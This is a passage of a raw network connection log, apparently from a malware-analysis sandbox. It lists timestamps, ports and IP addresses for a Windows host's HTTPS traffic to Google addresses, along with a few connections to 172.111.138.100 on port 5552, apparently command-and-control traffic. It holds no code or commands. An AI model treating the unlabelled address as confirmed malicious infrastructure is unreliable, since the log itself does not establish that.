Dec 30, 2024 11:25:27.417530060 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.417545080 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.551893950 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.552002907 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.552634954 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.552694082 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.556865931 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.556902885 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.557154894 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.557212114 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.557817936 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.599332094 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.824709892 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.824860096 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.825468063 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.825579882 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.882077932 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.882100105 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.882484913 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.883236885 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.883702040 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.931327105 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.009448051 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.009515047 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.009522915 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.009577036 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.011712074 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.011763096 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.017723083 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.017793894 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.044291019 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.044322014 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.045325994 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.045372009 CET	443	49818	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.045711994 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.045734882 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.045773029 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.045939922 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.045964003 CET	443	49818	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.047398090 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.047420025 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.050622940 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.050649881 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.051060915 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.051071882 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.258220911 CET	49820	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:28.263088942 CET	5552	49820	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:28.263232946 CET	49820	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:28.263686895 CET	49820	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:28.268495083 CET	5552	49820	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:28.292288065 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.292428017 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.292434931 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.292519093 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.293159008 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.293210983 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.293216944 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.293322086 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.300873041 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.300916910 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.301259995 CET	49822	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.301306009 CET	443	49822	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.301439047 CET	49822	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.303339958 CET	49822	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.303369999 CET	443	49822	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.407408953 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.407468081 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.407529116 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.407547951 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.407583952 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.407605886 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.407633066 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.411724091 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.411735058 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.412884951 CET	49829	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.412909031 CET	443	49829	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.413094997 CET	49829	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.414344072 CET	49829	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.414356947 CET	443	49829	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.565248013 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.565304995 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.565308094 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.565325975 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.565368891 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.565373898 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.565402985 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.565407038 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.565418005 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.565455914 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.575701952 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.575731993 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.577138901 CET	49830	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.577169895 CET	443	49830	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.577224970 CET	49830	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.577454090 CET	49830	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:28.577471018 CET	443	49830	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:28.645992994 CET	443	49818	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.646122932 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.647098064 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.647111893 CET	443	49818	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.650320053 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.650331974 CET	443	49818	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.910454035 CET	443	49822	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.910537958 CET	49822	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.932066917 CET	49822	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.932096004 CET	443	49822	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:28.941318989 CET	49822	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:28.941337109 CET	443	49822	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.021764040 CET	443	49818	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.021894932 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.022906065 CET	443	49818	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.022943020 CET	443	49818	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.022955894 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.022986889 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.023613930 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.023639917 CET	443	49818	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.023646116 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.023783922 CET	49818	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.024427891 CET	49832	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.024457932 CET	443	49832	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.024508953 CET	49832	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.026108027 CET	49832	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.026134968 CET	443	49832	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.026823044 CET	443	49829	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.026943922 CET	49829	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.027275085 CET	49829	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.027286053 CET	443	49829	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.027446032 CET	49829	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.027452946 CET	443	49829	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.204598904 CET	443	49830	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.205318928 CET	49830	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.233978033 CET	49830	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.234009027 CET	443	49830	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.234138012 CET	49830	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.234144926 CET	443	49830	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.286284924 CET	443	49822	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.286632061 CET	443	49822	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.292042971 CET	49822	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.426332951 CET	49822	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.426351070 CET	443	49822	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.431015968 CET	443	49829	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.431060076 CET	443	49829	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.431155920 CET	443	49829	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.435333967 CET	443	49829	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.435390949 CET	49829	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.439929962 CET	49829	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.451940060 CET	49833	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.451987982 CET	443	49833	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.459920883 CET	49833	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.483249903 CET	49833	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.483272076 CET	443	49833	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.495033026 CET	49832	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.495223999 CET	49829	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.504736900 CET	49833	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.504741907 CET	49830	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.542553902 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.542553902 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.542593956 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.542596102 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.543601990 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.543606043 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.544749022 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.544748068 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.544764996 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.544764996 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.702647924 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.702706099 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.704046965 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.705626011 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:29.705641031 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:29.709119081 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.709180117 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:29.710526943 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.710526943 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:29.710565090 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.141908884 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.142342091 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.142689943 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.142761946 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.152102947 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.152128935 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.152441025 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.152561903 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.153150082 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.173742056 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.174030066 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.174416065 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.174427986 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.176443100 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.176455975 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.195338011 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.304497957 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.304560900 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.304980040 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.304996014 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.305288076 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.305296898 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.330739021 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.330816031 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.331485033 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.331537962 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.333293915 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.333307981 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.333549976 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.333602905 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.334129095 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.379339933 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.425365925 CET	5552	49820	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:30.425460100 CET	49820	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:30.489918947 CET	49820	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:30.494771004 CET	5552	49820	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:30.518398046 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.518464088 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.518500090 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.518548965 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.518556118 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.518587112 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.518599987 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.518631935 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.518719912 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.518738031 CET	443	49834	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.518769026 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.518788099 CET	49834	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.519440889 CET	49848	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.519471884 CET	443	49848	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.519546032 CET	49848	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.519736052 CET	49848	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.519743919 CET	443	49848	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.584888935 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.584939003 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.584983110 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.584983110 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.585005045 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.585076094 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.585078001 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.585165024 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.597976923 CET	49835	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.597999096 CET	443	49835	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.599260092 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.599292994 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.599354982 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.599813938 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.599823952 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.705954075 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.706020117 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.706056118 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.706098080 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.706130028 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.706170082 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.706181049 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.706226110 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.707608938 CET	49839	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.707628012 CET	443	49839	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.708340883 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.708373070 CET	443	49855	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.708468914 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.708681107 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:30.708692074 CET	443	49855	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:30.726998091 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.727051020 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.727088928 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.727123976 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.727135897 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.727159023 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.727164984 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.727174997 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.727199078 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.727216959 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.728209972 CET	49838	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.728225946 CET	443	49838	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.729016066 CET	49856	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.729063034 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:30.729119062 CET	49856	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.729455948 CET	49856	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:30.729469061 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.120028973 CET	443	49848	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.120145082 CET	49848	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.123034954 CET	49848	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.123040915 CET	443	49848	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.123436928 CET	49848	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.123440981 CET	443	49848	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.226399899 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.226466894 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.227339029 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.227345943 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.227493048 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.227498055 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.333561897 CET	443	49855	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.333683014 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.334188938 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.334207058 CET	443	49855	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.334424019 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.334430933 CET	443	49855	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.337786913 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.337882996 CET	49856	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.338241100 CET	49856	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.338247061 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.338474035 CET	49856	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.338479996 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.495780945 CET	443	49848	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.496777058 CET	443	49848	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.496841908 CET	49848	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.499126911 CET	49848	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.500215054 CET	49848	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.500236034 CET	443	49848	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.500844955 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.500869036 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.501028061 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.501580000 CET	49863	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.501588106 CET	443	49863	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.637429953 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.637501955 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.637579918 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.637579918 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.637609005 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.637622118 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.637947083 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.638499975 CET	49851	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.638518095 CET	443	49851	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.639286041 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.639331102 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.639648914 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.639648914 CET	49864	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.639684916 CET	443	49864	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.707699060 CET	443	49855	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.707880974 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.707896948 CET	443	49855	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.708060980 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.708060980 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.708106041 CET	443	49855	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.708226919 CET	49855	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.708703995 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.708760023 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.708865881 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.709079027 CET	49865	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:31.709095955 CET	443	49865	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:31.787100077 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.787153006 CET	443	49856	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:31.787220955 CET	49856	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:31.787220955 CET	49856	443	192.168.2.10	142.250.184.225
